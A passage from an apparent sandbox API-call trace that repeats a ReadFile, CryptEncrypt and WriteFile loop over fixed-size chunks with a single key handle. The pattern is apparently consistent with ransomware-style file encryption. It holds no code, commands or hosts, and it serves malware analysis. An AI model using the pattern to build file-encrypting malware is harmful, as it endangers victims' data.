lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.623] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.623] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.623] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.623] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.623] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.624] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.625] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.625] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.625] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.625] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.625] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.626] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.626] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.626] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.626] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.626] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.628] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.628] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.628] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.628] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.629] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.629] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.629] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.629] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.629] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.629] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.629] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.630] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.630] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, 